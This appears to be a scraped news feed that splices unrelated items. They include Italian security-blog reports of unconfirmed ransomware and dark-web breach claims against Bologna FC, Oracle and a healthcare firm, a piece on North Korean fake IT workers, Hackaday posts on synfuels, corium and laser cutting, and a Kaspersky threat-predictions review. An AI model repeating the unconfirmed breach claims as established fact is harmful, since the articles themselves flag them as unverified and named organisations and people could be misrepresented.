Al momento, non possiamo confermare la veridicità della notizia, poiché l’organizzazione non ha ancora rilasciato alcun comunicato stampa ufficiale sul proprio sito web riguardo l’incidente. Pertanto, questo articolo deve essere considerato come ‘fonte di intelligence’.

RansomHub e il modello RaaS

RansomHub opera con il modello di Ransomware-as-a-Service (RaaS), una struttura che consente agli affiliati di lanciare attacchi utilizzando strumenti forniti dal gruppo centrale. Questo sistema non si limita al blocco dei dati tramite crittografia, ma punta sull’esfiltrazione delle informazioni e sulla successiva minaccia di pubblicarle per aumentare la pressione sulle vittime.

Nel caso del Bologna FC, il gruppo avrebbe dichiarato che il club non dispone di misure di sicurezza adeguate, utilizzando il GDPR come ulteriore strumento di coercizione. Le sanzioni previste dal regolamento europeo per la mancata protezione dei dati possono raggiungere i 10 milioni di euro o il 2% del fatturato, un fattore che potrebbe spingere le vittime a considerare il pagamento del riscatto.

Dati sottratti

RansomHub afferma di aver trafugato una vasta quantità di informazioni, inclusi:

• Contratti di sponsorizzazione con dettagli economici.
• Strategie aziendali e commerciali del club.
• Dati personali di giocatori, tifosi e dipendenti.
• Documenti medici completi dei calciatori.
• Informazioni su trasferimenti e giovani talenti.
• Scansioni di passaporti e dettagli bancari, tra cui quello dell’allenatore Vincenzo Italiano.

Alcuni screenshot di questi documenti sarebbero stati già pubblicati nel dark web, dimostrando l’autenticità del furto e intensificando la pressione sul Bologna FC.

Conclusione

Se confermato, l’attacco al Bologna FC rappresenta un segnale d’allarme per tutte le organizzazioni, sportive e non. La combinazione ditecnologie avanzate e tattiche di pressionesta trasformando i ransomware in una delle minacce più insidiose del nostro tempo. Con un attacco simile, il mondo dello sport non può più ignorare la crescente minaccia cyber. È cruciale adottare strategie di sicurezza che comprendano monitoraggi costanti, l’implementazione di tecnologie avanzate e una cultura della cybersecurity condivisa tra tutte le figure aziendali. Solo così sarà possibile evitare che il prossimo club a essere colpito possa vedere i propri dati, e la propria reputazione, messi in pericolo.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.

L'articolo Il Bologna FC nel mirino di RansomHub che rivendica 200 GB di dati! proviene da il blog della sicurezza informatica.

Un attore malevolo ha pubblicato su un forum nel dark web due annunci in cui afferma di aver ottenuto accesso non autorizzato alla piattaforma cloud di Oracle e ai server di un’importante azienda globale nel settore sanitario.

Le dichiarazioni del cybercriminale sollevano preoccupazioni significative riguardo alla sicurezza delle infrastrutture critiche e alla protezione dei dati personali a livello globale.

Attualmente, non possiamo confermare l’autenticità della notizia, poiché l’organizzazione non ha ancora pubblicato un comunicato ufficiale sul proprio sito web in merito all’incidente. Le informazioni riportate provengono da fonti pubbliche accessibili su siti underground, pertanto vanno interpretate come una fonte di intelligence e non come una conferma definitiva.

Primo Post: Vendita di Accesso API di Oracle Cloud

Nel primo post, il cybercriminale ha dichiarato di aver compromesso l’accesso alla piattaforma cloud di Oracle, offrendolo in vendita al miglior offerente per la cifra di 100.000 dollari in cripto.

Oracle, è un colosso globale nel campo del software aziendale e delle soluzioni cloud, rappresenta una colonna portante della tecnologia mondiale. La compromissione di un accesso API esclusivo alla sua piattaforma potrebbe avere ripercussioni devastanti, potenzialmente aprendo la porta a exploit su larga scala contro aziende clienti e interi ecosistemi digitali.

Secondo Post: Dati Sanitari Globali Esposti

Nel secondo annuncio, l’attore malevolo ha alzato ulteriormente la posta, dichiarando di aver violato i server di un’importante azienda sanitaria globale sfruttando le infrastrutture Oracle. Secondo quanto riportato, l’attacco avrebbe portato all’accesso e alla vendita di dati sensibili relativi a milioni di cittadini in tutto il mondo. Tra le informazioni compromesse si troverebbero:

• Dati identificativi personali
• Numeri di telefono
• Nomi completi
• Indirizzi email
• Dettagli sensibili aggiuntivi

L’attore sostiene inoltre di avere pieno controllo sui server cloud e sulle applicazioni utilizzate dall’azienda sanitaria, mettendo i dati rubati in vendita per una cifra di 15.000 dollari, accettando criptovalute come Bitcoin, Ethereum o Litecoin.

Per contattare direttamente il criminale, è stato persino fornito un indirizzo Tox, segnalando l’intento di negoziare o vendere informazioni senza lasciare tracce attraverso canali anonimi e criptati.

Le conseguenze potenziali di queste violazioni, se confermate, sono estremamente gravi. I dati personali di milioni di persone potrebbero finire nelle mani sbagliate, alimentando frodi finanziarie, furti d’identità e altre attività criminali. Inoltre, la vendita di accesso API alla piattaforma cloud di Oracle potrebbe dare a ulteriori attori malevoli la possibilità di perpetrare attacchi su scala ancora maggiore, danneggiando clienti aziendali e infrastrutture critiche.

Di fronte a queste minacce, è imperativo agire rapidamente e con decisione. Alcune misure chiave includono:

1. Monitorare i forum del dark web: Tracciare l’attività legata a queste dichiarazioni per rilevare sviluppi e rischi imminenti.
2. Verificare l’autenticità delle affermazioni: Collaborare con esperti di sicurezza per identificare le vulnerabilità e limitarne immediatamente l’impatto.
3. Proteggere clienti e utenti finali: Comunicare con trasparenza e offrire supporto a coloro che potrebbero essere stati colpiti.
4. Implementare audit approfonditi: Rafforzare la sicurezza dei sistemi Oracle e dei partner aziendali attraverso controlli e aggiornamenti rigorosi.

Le dichiarazioni di questo attore malevolo non sono solo un segnale d’allarme, ma un vero e proprio invito all’azione. Oracle e le aziende coinvolte devono reagire con urgenza, adottando misure preventive e correttive per proteggere i propri sistemi e la privacy degli utenti.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.

L'articolo Attacco Hacker su Scala Globale: Oracle e Salute Pubblica nel Mirino proviene da il blog della sicurezza informatica.

This week, Jonathan Bennett and Lars Wikman chat about Elixir and Nerves — a modern language that’s a take on Erlang, and an embedded Linux approach for running Elixir code on devices.

• underjord.io/feed/
• elixir-lang.org/
• nerves-project.org/
• Introducing Elixir and the ecosystem from Oredev 2023
• Introducing Nerves from Oredev 2024 (just released)
• The Soul of Erlang & Elixir, by Sasa Juric

Subscribe to catch the show live, and come to Hackaday for the rest of the story!

youtube.com/embed/ZGKxutJVw_g?…

Did you know you can watch the live recording of the show Right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

hackaday.com/2024/11/27/floss-…

Fossil fuels can be a bit fussy to access, and geopolitics tends to make prices volatile. Burning them also takes carbon out of the ground and puts it into the atmosphere, with undesirable climate implications. The hunt for a solution has been on for quite some time.

Various synthetic fuels have been proposed as a solution, wherein carbon dioxide is captured from the air and chemically processed into useful fuel. Done properly, this could solve the climate issue where any fuel burned has its carbon later captured to make more fuel. The problem, though, is that this process is very energy intensive. Given the demands, it’s no surprise that some are looking towards nuclear reactors for the answer.

Hot To Go

Synthetic fuels are typically designed to replace conventional gasoline, diesel, or jet fuel. Credit: DOE, public domain
Burning fossil fuels is bad for the environment, but the problem is that they’re so very useful. Take transport, for example. Fossil fuels are perfect for this application because they pack a huge amount of energy into very little space while weighing relatively little to boot. At the same time, more than a third of global carbon emissions in 2021 came from transportation, according to the International Energy Agency. While electric vehicles are rapidly gaining market share in some areas, the complete phase out of internal combustion engines is by no means a sure thing. Meanwhile, sectors like aviation are proving especially difficult to fully electrify. We want to get off fossil fuels, but circumstances demand we continue to use them.

Enter synthetic fuels. They’re essentially drop-in replacements for gasoline, diesel and jet fuel that are produced from CO2, water and clean energy rather than being refined from petroleum. When made using captured CO2 and cleanly-produced hydrogen, they have the potential to significantly reduce transport emissions when taking the whole system into account. All this, without requiring an entirely new fueling infrastructure or any changes for the end user.

By capturing carbon and then chemically processing it into a useful combustible fuel, we could keep using existing technologies that we already find practical, like combustion-engined vehicles. Their emissions would still be undesirable, but they’d be offset by the capture process used to make new fuel. The idea is to create a closed loop for carbon emissions. The problem is finding a synfuel production process that’s efficient—both in terms of carbon capture and chemical processing—and to find the energy to run it.

Indeed, synthesizing hydrocarbons is an energy-intensive process. The process is well-understood at this point. Capturing CO2 from the air, generating hydrogen via electrolysis, and catalytically combining them into fuels at high temperatures and pressures all require a lot of energy input. For synfuels to deliver real climate benefits, this energy must come from clean, non-fossil sources.
The Department of Energy has a strong interest in nuclear synfuel production. Credit: Argonne National Laboratory
What do we do when we need a lot of power with minimum emissions? We look at nuclear! Several U.S. Department of Energy labs are actively researching nuclear-powered synfuel production, and the DOE is funding a $20 million demonstration project in Utah. Meanwhile, in the United Kingdom, the Nuclear Industry Association has been urging the country to seize a leadership position in this emerging field as well.

On a very basic level, a conventional nuclear power plant could provide electricity for various processes involved in synthetic fuel production. However, that’s not the only way to go. For some processes, the heat from a nuclear reactor could be directly used to power the synfuel production process. That is, rather than using heat from a nuclear reaction to create steam to turn a turbine, a purpose-built synfuel reactor could just deliver heat directly to a chemical process that needs it. Nuclear heat could be useful for desalinating seawater for hydrogen electrolysis, or for carbon capture, too.
The chemistry involved in synfuel production is well understood. The problem is figuring out how to do it cheaply enough to be competitive with fossil fuels, while using clean sources of CO2 and hydrogen. Credit: Argonne National Laboratory
The question is whether all the effort will be worthwhile. Competing with regular old fossil fuels on price will be a must, even if some degree of subsidy is used to lean the scales in the favor of synfuels. There are hopes that nuclear-produced synfuels could reach prices of $3 a gallon with the right feedstocks and input costs, but that’s words on a page at this stage. There is plenty of engineering to be done before you’ll be filling your car with 20 gallons of nuke gas at your local station.

Efficiency also comes into it, and this could play a big role in how synfuels pan out. Take cars, for example. Automakers have figured out how to make supremely efficient electric vehicles in the past decade. Electrical engineers have become experts at squirting power efficiently all over the country, and there are more EV charging stations than ever. Does it make sense to spin up bespoke nuclear synfuel plants to keep internal combustion alive, when the technology to replace it already exists? Arguments could be made for more demanding applications like trucking or aviation, but then the market for synfuels grows smaller.
Synthetic fuels are particularly attractive for the aviation industry, which has found electrification hard to achieve due to the limits of battery technology. Credit: US Air Force, public domain
In any case, nuclear synfuel holds great promise. Whether it can overcome the general resistance towards all nuclear technologies remains to be seen. Still, the tides may be changing on that front, and the future is anyone’s guess. If you’re a fan of fossil fuels and the like, be happy—there is hope yet that the flammable fluid market will roll on.

hackaday.com/2024/11/27/could-…

During World War II, shipboard life in the United States Navy was a gamble. No matter which theater of operations you found yourself in, the enemy was all around on land, sea, and air, ready to deliver a fatal blow and send your ship to the bottom. Fast forward a couple of decades and Navy life was just as hazardous but in a different way, as this Navy training film on the shipboard hazards of low-voltage electricity makes amply clear.

With the suitably scary title “115 Volts: A Deadly Shipmate,” the 1960 film details the many and various ways sailors could meet an untimely end, most of which seemed to circle back to attempts to make shipboard life a little more tolerable. The film centers not on the risks of a ship’s high-voltage installations, but rather the more familiar AC sockets used for appliances and lighting around most ships. The “familiarity breeds contempt” argument rings a touch hollow; given that most of these sailors appear to be in their 20s and 30s and rural electrification in the US was still only partially complete through the 1970s, chances are good that at least some of these sailors came from farms that still used kerosene lamps. But the point stands that plugging an unauthorized appliance into an outlet on a metal ship in a saltwater environment is a recipe for being the subject of a telegram back home.

The film shows just how dangerous mains voltage can be through a series of vignettes, many of which seem contrived but which were probably all too real to sailors in 1960. Many of the scenarios are service-specific, but a few bear keeping in mind around the house. Of particular note is drilling through a bulkhead and into a conduit; we’ve come perilously close to meeting the same end as the hapless Electrician’s Mate in the film doing much the same thing at home. As for up-cycling a discarded electric fan, all we can say is even brand new, that thing looks remarkably deadly.

The fact that they kept killing the same fellow over and over for each of these demonstrations doesn’t detract much from the central message: follow orders and you’ll probably stay alive. In an environment like that, it’s probably not bad advice.

youtube.com/embed/ylhf1dLD6QA?…

hackaday.com/2024/11/27/retrot…

So now we’ve talked about all kinds of byproducts, including man-made (Fordite), nature-made (fulgurites), and one that’s a little of both (calthemites). Each of these is beautiful in its own way, but I’m not sure about the beauty and merit of corium — that which is created in a nuclear reactor core during a meltdown.
A necklace made to look like corium. Image via OSS-OSS
Corium has the consistency of lava and is made up of many things, including nuclear fuel, the products of fission, control rods, any structural parts of the reactor that were affected, and products of those parts’ reaction with the surrounding air, water, and steam.

If the reactor vessel itself is breached, corium can include molten concrete from the floor underneath. That said, if corium is hot enough, it can melt any concrete it comes in contact with.

So, I had to ask, is there corium jewelry? Not quite. Corium is dangerous and hard to come by. But that doesn’t stop artisans from imitating the substance with other materials.

Forming Corium

Chernobyl corium in steam discharge corridor. Image via ICTP
Corium lava was produced at both Chernobyl and Fukushima Dai’ichi, and on a smaller scale at Three Mile Island. It’s a rare thing, this man-made lava, and it’s only produced when humans gather enough highly-radioactive isotopes to start a chain reaction.

When a nuclear meltdown occurs, the fission reaction occurring within the reactor is no longer sufficiently cooled and contained to keep the rods, cases, core containment vessel, et cetera cool. Heat builds rapidly, produced by the fission of uranium-235 and plutonium-239.

If the chain reaction of fission and decays is allowed to go on, the heat will build up enough that the fuel rods start to bend and eventually melt. Usually, this is controlled by cooling water and control rods that are able to absorb some of the neutrons created by fission and decay. But if the fuel rods become fully molten, then you’ve got a meltdown on your hands.

April 26, 1986

The largest formation of corium in existence occurred during the Chernobyl disaster. In fact, so much corium issued forth that the molten mass dripped underneath to form stalactites, stalagmites, and lava flows such as the Elephant’s Foot.
The Chernobyl Elephant’s Foot, a large mass of corium. Image via Wikipedia
Chernobyl’s corium was formed over several days in three phases, the first of which lasted only seconds. The second stage lasted six days and comprised the interaction of the lava with silica-based structural materials like sand, concrete, and serpentinite. Finally, fuel lamination took place, and the molten corium penetrated the floors and solidified.

The corium at Chernobyl consists of uranium dioxide fuel, zircaloy cladding, concrete, and the serpentinite that had been packed around the reactor to serve as thermal insulation. Analysis has since shown that the corium reached a maximum temperature of 2,255 °C (4,091 °F). Far from cooling quickly, it remained above 1,660 °C (3,020 °F) for several days.

Chernobyl Corium

There are five types of material in Chernobyl’s corium:

• black ceramics: dark black, glassy material with a highly pitted surface
• brown ceramics: brown, glassy material that is both glossy and dull
• slag-like granulated corium: these are glassy granules with a crust and range from gray-magenta to a dark brown. These were formed by extended contact of brown ceramics with water
• pumice: grayish-brown porous formations that were formed when molten brown ceramic came into contact with water
• metal: both molten and solidified

The Elephant’s Foot is a large mass comprised of black corium and has many layers. It resembles tree bark on its surface. In order to get to where it was discovered in December 1986 (15 meters southeast of the reactor in a maintenance corridor), the corium burned through 2 m (6 ft) of reinforced concrete, then traveled through pipes and fissures and flowed down a hallway.

Three Mile Island

By comparison, the accident at Three Mile Island was a slow, partial meltdown. Within two minutes, over 40,000 pounds of various materials melted and relocated. And although a pool of corium formed at the bottom of the reactor vessel, it wasn’t breached.

Eventually, scientists took samples from the reactor and discovered two masses of dull, grey corium with a few yellow areas — one in the fuel assembly, and the other on the lower head of the reactor vessel. They found the corium to be mostly molten fuel and cladding. Elementally, it was mostly uranium, along with zirconium, oxygen, stainless steel, and an alloy called Inconel. Some of the samples included silver and indium from the control rods.

Melting and Smelting

Man-made lava is a terrible, amazing thing that, ideally, will remain rare. But not all byproducts are rare, and certainly not all of them have cool names. What could I possibly be talking about? Stay tuned!

hackaday.com/2024/11/27/boss-b…

Sembra che il problema dei falsi specialisti IT nordcoreani si sia diffuso non solo nelle aziende degli Stati Uniti. Secondo gli analisti di Microsoft, schemi simili sono operativi in ​​tutto il mondo, tra cui Cina, Russia e altri paesi.

Ricordiamo che negli ultimi mesi sono arrivate segnalazioni secondo cui gli hacker nordcoreani ottengono segretamente lavoro in aziende americane. Successivamente tentano di installare malware sui computer da lavoro, oltre a rubare dati dalle reti aziendali e chiedere riscatti.

Allo stesso tempo, gli specialisti di sicurezza informatica ritengono che non tutti gli specialisti IT della Corea del Nord siano coinvolti in attività dannose e spionaggio informatico. Alcuni effettivamente lavorano, e gli alti stipendi che ricevono, secondo i ricercatori, “generano entrate per il programma nucleare della Corea del Nord”.

A loro volta, le autorità americane stanno combattendo questo fenomeno scoprendo persone che aiutano a realizzare tali operazioni negli Stati Uniti. In sintesi stanno creando delle factory di laptop per trasferire il denaro rubato all’estero.

Ora gli specialisti Microsoft hanno redatto un rapporto e lo hanno presentato alla conferenza CYBERWARCON. Secondo Microsoft, la Corea del Nord aggira sanzioni e barriere finanziarie. Lo fa introducendo i suoi “specialisti IT” in aziende di Russia, Cina e altri paesi. Migliaia di dipendenti sono stati collocati con l’aiuto di terze parti. Queste forniscono conti bancari, telefoni, carte SIM e account sui social media e portali di lavoro.

Su GitHub sono stati scoperti centinaia di profili e portfolio falsi di falsi professionisti IT nordcoreani.Il mese scorso, Microsoft ha scoperto un archivio pubblico collegato a queste operazioni. L’archivio conteneva curriculum, e-mail, dati di account VPS e VPN, e vari tutorial. Erano presenti anche informazioni su portafogli, account (LinkedIn, GitHub, Upwork, TeamViewer, Telegram, Skype) e persino buste paga.
Profili falsi di specialisti nordcoreani

Microsoft ha ribadito un fenomeno già segnalato. I falsi specialisti IT usano dati personali rubati per candidarsi. Aggiungono foto rubate ai documenti. Utilizzano strumenti di intelligenza artificiale per creare curriculum e moduli di domanda.Inoltre, i ricercatori avvertono che gli aggressori utilizzano attivamente programmi per cambiare la voce.

“Anche se non abbiamo rilevato aggressori che utilizzano la tattica del cambio della voce e del video attraverso l’intelligenza artificiale, è sicuro che in futuro tali strumenti verranno utilizzati per poter ingannare le aziende”, avverte Microsoft.

L'articolo Impiegati Infedeli 2.0: Quando il Tecnico IT Usa ha quel Certo Accento Nordcoreano proviene da il blog della sicurezza informatica.

Samples taken from the space-returned piece of asteroid Ryugu were collected and prepared under strict anti-contamination controls. Inside the cleanest of clean rooms, a tiny particle was collected from the returned sample with sterilized tools in a nitrogen atmosphere and stored in airtight containers before being embedded in an epoxy block for scanning electron microscopy.

It’s hard to imagine what more one could do, but despite all the precautions taken, the samples were rapidly colonized by terrestrial microorganisms. Only the upper few microns of the sample surface, but it happened. That’s what the images above show.
The surface of Ryugu from Rover 1B’s camera. Source: JAXA
Obtaining a sample from asteroid Ryugu was a triumph. Could this organic matter have come from the asteroid itself? In a word, no. Researchers have concluded the microorganisms are almost certainly terrestrial bacteria that contaminated the sample during collection, despite the precautions taken.

You can read the study to get all the details, but it seems that microorganisms — our world’s greatest colonizers — can circumvent contamination controls. No surprise, in a way. Every corner of our world is absolutely awash in microbial life. Opening samples on Earth comes with challenges.

As for off-Earth, robots may be doing the exploration but despite NASA assembling landers in clean room environments we may have already inadvertently exported terrestrial microbes to the Moon, and Mars. The search for life to which we are not related is one of science and humanity’s greatest quests, but it seems life found on a space-returned samples will end up looking awfully familiar until we step up our game.

hackaday.com/2024/11/27/life-f…

Overview of 2024 consumer cyberthreats and trends predictions

Part of the Kaspersky Security Bulletin, our predictions for 2024 identified key consumer cyberthreats and trends shaped by global events, technological advances and evolving user behavior.

Last year, we suggested that charity-related scams would increase globally. While cybercriminals exploited humanitarian crises and charitable causes, taking advantage of both major conflicts and new donation methods, the anticipated boost could not be confirmed. We witnessed cases of abusing such efforts, particularly those associated with the Israeli-Hamas conflict, with Kaspersky researchers uncovering more than 540 scam emails and numerous fraudulent websites that imitated legitimate humanitarian aid campaigns. However, charity platforms’ ever-evolving protective measures and growing integration between charitable giving and day-to-day online shopping have provided more secure and convenient ways for users to make a contribution without exposing themselves to scammers, which also proves our prediction about such collaboration as accurate.

In line with our expectations regarding VPN usage and internet segmentation, 2024 saw a notable global surge in the popularity of VPN and proxy services, with applications gaining significant popularity across various countries. This trend is largely driven by users seeking to bypass regional content restrictions and enhance online privacy. However, this increased demand has attracted malicious actors. Cybercriminals are exploiting the popularity of VPN services by spreading potentially harmful applications disguised as legitimate VPN tools. Kaspersky has reported a surge in these malicious apps, capable of compromising user data and security.

In 2024, the prediction that national security concerns would lead to restrictions imposed on apps and services, thus creating new security issues, proved accurate. Governments worldwide used security as a justification for limiting access to popular platforms, often leaving users with fewer and potentially less secure alternatives in the process. Notable developments included the temporary suspension of X (formerly Twitter) in Brazil by a court ruling, ongoing discussions about TikTok’s ownership structure in the United States, and the removal of various messaging apps from Apple’s App Store in China.

Our prediction that play-to-earn (P2E) gaming platforms would attract cybercriminals was also fulfilled, with multiple cases highlighting the sector’s vulnerabilities. Kaspersky researchers uncovered phishing schemes targeting Hamster Kombat players, a popular Telegram-based clicker game, where attackers used fraudulent links to steal credentials and gain unauthorized access to user accounts. Similarly, Kaspersky GReAT discovered a scheme devised by the Lazarus group, which developed a malicious decoy game disguised as a legitimate P2E platform containing sophisticated malware designed to steal cryptocurrency and sensitive user data.

Despite the growing need driven by advancements in generative AI technology, the prediction about the development of a universal deepfake verification tool remained unfulfilled in 2024. While user-generated content (UGC) platforms like TikTok and Instagram have introduced policies requiring creators to label AI-generated content, the effectiveness of these measures is limited by their reliance on users’ honesty and awareness.

Just as predicted, the rise of voice deepfakes continued in 2024, fueling scams like vishing (voice phishing). A notable example is the proliferation of “fake kidnapping” scams, where attackers use voice imitation technology to impersonate real individuals and extort money from their families. The availability of open-source voice generation models expanded significantly, making these tools more accessible and lowering the technological threshold for malicious actors. The challenge of combating deepfakes extends beyond advances in tech and includes the need to raise public awareness and ensure the seamless integration of detection tools into everyday life.

Lastly, cybercriminals capitalized on the anticipation surrounding major film and game releases in 2024, which aligned with our earlier predictions. The release of “Joker 2” was accompanied by scams like phishing websites and fake streaming links, that aimed to deceive eager fans. Although “Grand Theft Auto VI” (GTA VI) is scheduled for release in 2025, scammers have already started to exploit its popularity by creating fake beta versions and unauthorized mobile releases to trick users into downloading malware or submitting personal information.

Overview of 2024 privacy predictions

The privacy landscape in 2024 was shaped by significant technological advances and evolving societal concerns, aligning with many of our predictions but leaving some areas underdeveloped.

Biometric data gained recognition as a critical aspect of privacy protection, with the European Union adopting the Artificial Intelligence (AI) Act to address privacy concerns associated with facial recognition and other biometric technologies. This marked a notable step towards expanding the concept of private data beyond traditional means of identification. However, while the EU led these efforts, global consensus and comprehensive implementation of similar standards remain ongoing challenges, rendering the anticipated trend of stricter regulation of biometric data usage only partially fulfilled.

Predicted privacy debates surrounding AI-enabled wearables, such as Humane’s AI Pin, did not gain much traction, as these devices struggled to make significant advancements in 2024. As a result, discussions surrounding these technologies often merged with those about AR and VR devices, which saw more tangible development. Devices like Apple Vision Pro and Meta’s Ray-Ban smart glasses highlighted similar concerns around data collection, biometric privacy, environmental mapping and bystanders’ consent. While these advancements brought privacy challenges to the forefront, the lack of robust regulatory frameworks left these predictions only partially realized. The immersive and pervasive nature of AR/VR technology underscores the urgency of establishing concrete regulatory measures to address these evolving concerns.

In 2024, the prediction that leaked passwords would become less of a concern saw partial realization. The increased adoption of passwordless authentication, supported by passkeys and biometric logins from major tech companies like Google, Microsoft and Apple, reduced the reliance on traditional passwords and mitigated the impact of credential leaks. However, the transition remains incomplete, with gaps in adoption leaving room for continued exploitation.

Assistant bots showed promise in enhancing privacy, particularly in mitigating phishing risks through call transcription and incoming caller screening, as predicted. However, the rise of sophisticated scams targeting bot vulnerabilities underscored the dual role of these technologies, showcasing both their potential and the need for stronger safeguards.

Overall, 2024 demonstrated progress in addressing critical privacy concerns while highlighting the need for continued advancement, global collaboration and comprehensive regulatory efforts to fully realize the potential of emerging technology in safeguarding privacy.

Consumer and privacy predictions for 2025

AI becomes an everyday reality

In 2025, artificial intelligence (AI) will solidify its role as a core element of daily life, transitioning from an innovative tool to a mundane utility. The rapid adoption of AI-driven technology across various domains — from search engines to creative tasks — has already reshaped how people work, learn and communicate. Major platforms like Google and Bing have integrated AI into search results, while users increasingly rely on chatbots for everything from answering questions and editing media to learning languages and simplifying workflows.

This trend is set to expand further with the anticipated release of advanced AI features in key operating systems like iOS and Android, marking a new phase in AI accessibility. As these capabilities roll out, AI will influence not only personal convenience but also broader industries. In academia, for instance, AI has accelerated research processes, and its contributions may reach new heights, as highlighted by the potential for groundbreaking achievements like the Nobel Prize awarded to the cofounder and scientist behind the AI initiative DeepMind.

However, alongside this normalization, challenges remain. AI’s ability to produce personalized deepfakes continues to evolve, raising ethical and privacy concerns in the absence of robust detection tools. As AI systems increasingly interact with and shape the physical world, the need for safeguards and accountability will grow. By 2025, AI’s ubiquity will transform it from a novelty into an indispensable part of modern life, with both opportunities and risks becoming more pronounced.

Fraudsters to exploit high-profile entertainment releases in 2025

In 2025, cybercriminals are expected to capitalize on the excitement surrounding major gaming, console and film releases. The launch of highly anticipated games like Mafia: The Old Country, Civilization VII and Death Stranding 2 will likely be accompanied by scams involving fake pre-orders and counterfeit digital keys. Similarly, rumors about the release of Nintendo’s next-generation console may fuel scams tied to pre-orders, early sales and fake hacking tools, some of which could deliver malware disguised as rootkits.

On the cinematic front, anticipated sequels and remakes like Superman, Jurassic World Rebirth, Captain America: Brave New World, Return to Silent Hill, and Tron: Ares will provide scammers with ample opportunity. Fraudulent campaigns may target fan forums and social media platforms by promoting fake early screenings, counterfeit merchandise and phishing emails. As the hype around these premieres intensifies, so will the sophistication and scale of cybercriminal activity seeking to exploit eager fans and consumers.

Proliferating subscription services to fuel fraud risks

As the global economy increasingly shifts towards subscription-based models, a significant uptick in fraud related to fake subscription offerings is anticipated. Cybercriminals are expected to exploit the growing shift in habits regarding subscriptions and reliance on these by creating counterfeit services that mimic legitimate ones. These fraudulent platforms aim to deceive users into providing personal and financial information, leading to identity theft and financial loss.

Moreover, with the proliferation of subscription services, some users may turn to unofficial resources to access content at reduced prices or for free. These non-official channels often lack proper security and may serve as hotspots for malware distribution, phishing attacks and other cyberthreats. Engaging with these platforms not only undermines legitimate businesses’ interests but also exposes users to heightened risks of fraud and data breaches.

Prohibition of social media for children may lead to broader user restrictions

Australia is considering legislation to ban children under 16 from using social media platforms like Facebook, Instagram, TikTok and X (formerly Twitter). The success of this measure hinges on its technical implementation, particularly in establishing reliable and effective age verification systems. If these challenges are successfully resolved, this legislation could serve as a model for similar restrictions globally. Moreover, successful implementation of a stricter approach might create a precedent for projecting restrictive measures onto other user groups, potentially reshaping international norms for regulating online platform access and use.

While unrelated to Australia’s initiative, content sharing platforms like Instagram are independently exploring advanced solutions to address age-related access issues. Instagram, for example, plans to deploy artificial intelligence to detect users misrepresenting their age, demonstrating how technology can enhance compliance with age-based policies. These innovations highlight the potential for scalable enforcement solutions, even as they face significant hurdles in ensuring accuracy and fairness.

Political polarization to fuel cyberbullying

In 2025, the increasing political divides affecting countries worldwide are expected to fuel a rise in cyberbullying, exacerbated by the global reach of social media platforms. Economic disparities, social movements and geopolitical conflicts have heightened tensions across Europe, Asia, Africa and the Americas. Social media platforms amplify these divides through algorithms that promote echo chambers and inflammatory content, creating an environment ripe for targeted harassment. Emerging AI tools, such as those used to create deepfakes or doctored posts, further enable malicious actors to escalate harassment. Although there are measures taken by various social media platforms to protect the online community from abuse, offensive content is hard to distinguish comprehensively, leaving users exposed to cyberbullying.

This trend will lead to an increase in the frequency of targeted attacks, doxing and coordinated cyberbullying campaigns, often crossing national boundaries. Individuals may face harassment not only from domestic adversaries but also from users abroad, making cyberbullying a transnational issue.

New regulations to expand user ownership of their data

In 2025, privacy regulations are set to hand users more control over their personal data than ever before. New laws may enable individuals to monetize their data, turning it from a corporate commodity into a personal asset. Expanded portability rights could make it easier to move data across platforms, encouraging competition and giving users the freedom to switch services without losing their digital history. Simplified consent models and enhanced rights to correct or delete data will further empower users to manage their online presence.

Globally, privacy frameworks like California’s CPRA and the EU’s GDPR are inspiring similar reforms in regions such as Asia and across U.S. states. Innovations like decentralized data storage may also emerge, giving users direct control over their data. By the end of 2025, the balance of power in the digital ecosystem may shift decisively toward individuals.

securelist.com/ksb-consumer-an…

If you were to walk into most of the world’s hackerspaces, it’s likely that the most frequent big-ticket tool you’ll find after a 3D printer is a laser cutter. A few years ago that would inevitably been one of the ubiquitous blue Chinese-made K40 machines, but here in 2024 it’s become common to see something far more sophisticated. For all that, many of us are still laser cutter noobs, and for us [Dominic Morrow] gave a talk at last summer’s EMF Camp in the UK entitled “Getting Started In Laser Cutting“. [Dominic] is a long-term laser cutting specialist who now works for Lightburn, so he’s ideally placed to deliver this subject.

It’s fair to say that this is an overview in the time available for a hacker camp talk rather than an in-depth piece, so he takes the approach of addressing people’s misconceptions and concerns about cutters. Perhaps the most important one he addresses is the exhaust, something we’ve seen a few in our community neglect in favor of excessive attention to laser cooling or other factors. An interesting one for us though was his talking about the cheaper diode lasers, having some insight into this end of the market is valuable when you have no idea which way to go.

We’re sorry to have missed this one in the real world, perhaps because of the allure of junk.

youtube.com/embed/o_i9Mv3Mby4?…

hackaday.com/2024/11/27/gettin…

Turning trash into art is something we undoubtedly all admire. [Davis DeWitt] did just that with a massive mural made entirely from discarded receipt paper. [Davis] got lucky while doing some light dumpster diving, where he stumbled upon the box of thermal paper rolls. He saw the potential them and, armed with engineering skills and a rental-friendly approach, set out to create something original.

The journey began with a simple test: how long can a receipt be printed, continuously? With a maximum length of 10.5 feet per print, [Davis] designed an image for the mural using vector files to maintain a high resolution. The scale of the project was a challenge in itself, taking over 13 hours to render a single image at the necessary resolution for a mural of this size. The final piece is 30 foot (9.144 meters) wide and 11 foot (3.3528 meters) tall – a pretty conversational piece in anyone’s room – or shop, in [Davis]’ case.

